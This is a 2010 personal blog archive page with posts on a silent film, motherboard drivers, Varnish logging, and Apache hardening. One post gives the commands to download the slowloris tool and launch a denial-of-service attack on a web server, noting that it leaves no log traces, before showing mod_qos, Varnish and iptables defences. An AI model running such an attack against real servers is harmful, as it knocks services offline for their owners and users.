Folks, Check out Nosferatu early horror movie in youtube!
The film dates back to the distant 1922, wow! 🙂
Archive for February, 2010
Nosferatu (1922) – One of the early horror movies
Thursday, February 4th, 2010Installing drivers on Computer with Motherboard ASUS A7N8X-VM with chipset (NVIDIA Nforce IGP)
Wednesday, February 3rd, 2010Today an old friend of mine’s wife who owns a small Architecture company,
did call asking if I can reinstall two computers running for her.
I accepted and here I am reinstalling the systems.
The first one lacked drivers and it was a real pain in the ass.
The system was a computer with Motherboard ASUS A7N8X-VM, in order to
determine the Motherboard type and chipset. I used a free program called
aida32 the program provides the user with quite a concrete description
of the computer hardware and is quite similar to the so famous but non-free
Everest .
After I’ve figured out the system hardware with AIDA32 which was:
Motherboard: ASUS A7N8X-VMChipset: NVIDIA Nforce IGPLAN Driver: NVIDIA-MCP2-Lan-ControllerGraphics Adapter: ATI Radeon 9600Sound Blaster: NVidia Audio Codec
Next I encountered problems finding the right driver pack, It took me
like 50 minutes to figure out what kind of driver should I use to make the
LAN Driver: NVIDIA-MCP2-Lan-Controller working on the PC.
I’ve found that actually this NVIDIA-MCP2-Lan-Controller is actually the:
Realtek RTL8201BL and therefore I need drivers for Realtek RTL8201BL.
After some time looking for the Driver I came to a forum which discussed the
issue. The author has revealed that the drivers required for the ASUS A7N8X-VM
is included in NVIDIA nforce in 15.45_nforce_winxp32_international_whql.exe
file which is available via nvidia.com’s website .After installing this NVIDIA nforce pack all worked like a charm!.
Configuring varnishd to log client IP addresses in Apache log
Wednesday, February 3rd, 2010I realized today, that because my varnish serves incoming connections to my
apache port a really annoying problem appears.
I mean in my httpd-access.log everytime I get some visit from the Net, the
incoming IP address logged in the Apache log is originating from 127.0.0.0
e.g. (localhost). That’s a real pain in the ass, cause it prevents me from
adequately tracking visitors countries and their networks.
Therefore to fix that and configure varnish to always log my original visitors
IPs to the apache log I had to follow instructions described in.
How can I log the client IP address on the backend? in the Varnish Cache FAQ
Here I will include step by step explanation how I practically implemented
the solution as explained in the FAQ on my FreeBSD.
First I had edit:
/usr/local/etc/varnish/default.vcl
The following is currently my default.vlc file content:
backend default {.host = "127.0.0.1";.port = "8080";}sub vcl_recv {# Add a unique header containing the client addressremove req.http.X-Forwarded-For;set req.http.X-Forwarded-For = client.ip;# [...]}
Next I had to add:
varnishd_config="/usr/local/etc/varnish/default.vcl"
to my /etc/rc.conf
And then modify my:
/usr/local/etc/apache2/httpd.conf
and include:
LogFormat "%{X-Forwarded-For}i %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"" varnishcombined
as well as:
CustomLog /var/log/httpd-access.log varnishcombined
to all my VirtualHosts.
Finally it’s required to restart both varnishd and apache
pcfreak# /usr/local/etc/rc.d/varnishd restartpcfreak# /usr/local/etc/rc.d/apache2 restart
That’s all folks!
How to defend against slowloris Webserver Denial of Service Attack
Tuesday, February 2nd, 2010Like you can read in my previous post, there is a terrible DoS attack dating back,
from the previous year. It’s a real shit and it was really annoying for me to figure out
that my Apache running on top of FreeBSD is vulnerable as well.
Therefore I needed desperately a fix, I was not really keen at the idea of installing
mod_qos, because I really hate third party software to mess up my Apache official module list.
Therefore I needed another approach, after some walk through google I found the following
How to best defend against a “slowloris” attack against Apache web server There are a couple of pathways
to follow as you can read in the post above. However the one that fit me best was through:
Varnish state-of-the-art high-performance HTTP accelerator (proxy) , it’s truely a wonderful piece of soft.
Installing it on FreeBSD was a piece of cake:
All I had to do was:
# cd /usr/ports/www/varnish# make install clean# echo 'varnishd_enable="YES"' >> /etc/rc.conf
And last but not least, I had to alter my /usr/local/etc/apache2/httpd.conf
and change everywhere the Listen port to 8080 instead of the default 80, the same
procedure goes for VirtualHosts ports as well.
Last thing to do was:
Restart Apache# /usr/local/etc/rc.d/apache2 restartStart varnishd# /usr/local/etc/rc.d/varnishd start
That’s it now varnishd handles the incoming connections to my Port 80, and passes whatever thinks appropriateto the apache server. Hip, Hip Hooray no more slowloris worries!
Another possible approach to Apache Denial of Service issues is to limit the maximum
allowed connections per host to be no more than 20.
On GNU/Linux this could be done with the following iptables rule:
# iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 40 -j DROP
On FreeBSD or OpenBSD with packet filter, you might bother to take a look at the following:
Howto: Basic Denial of Service Protection Using PF
But wait there is even more options to handle the slowloris DoS attack. It looks some enthusiast
has created even Apache module that handles the loris attack, sources of the non-official
mod_antiloris module release as well asprecompiled binaries in rpm can be obtained here.
Apache Denial of Service (DoS) attack with Slowris / Crashing Apache
Monday, February 1st, 2010 
A friend of mine pointed me to a nice tool that is able to create a succesful denial of service to
most of the running web servers out there. The tools is called slowris
For any further information there is the following publication on ha.ckers.org about slowris
The original article of the friend of mine is located on his (mpetrov.net) person blog .
Unfortunately the post is in Bulgarian so it’s not a match for English speaking audience.
To launch the attack on Debian Linux all you need is:
# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
now issue the attack
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache
There you go the Apache server is not responding, no-traces of the DoS are left on the server,
the log file is completely clear of records!
;The fix to the attack comes with installing the not so popular Apache module: mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.cThe module is installing to "/usr/lib/apache2/modules"All left is configuring the module
# cd /etc/apache2/mods-available/
#vim qos.load
Add the following in the file:
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.
Unix User
Monday, February 1st, 2010
